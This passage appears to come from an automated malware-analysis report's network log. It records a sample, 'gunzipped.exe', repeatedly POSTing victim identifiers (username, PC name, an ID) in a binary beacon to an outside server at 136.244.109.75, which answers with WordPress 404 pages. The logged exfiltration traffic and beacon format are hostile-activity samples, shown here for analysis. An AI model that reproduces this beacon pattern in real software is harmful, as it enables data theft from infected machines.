6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:56.088908911 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:56.088946104 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:56.088982105 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:56.089024067 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:56.089061022 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:56.089098930 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:56.089139938 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:56.089178085 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:56.089221954 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49755	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:56.686681986 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:56.889962912 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:57.797519922 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:56 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:57.797590017 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:57.797631979 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:57.797671080 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:57.797712088 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:57.797749043 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:57.797787905 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:57.797826052 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:57.797863007 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:57.797904015 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49756	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:58.145128012 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:58.348887920 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:59.276449919 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:58 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 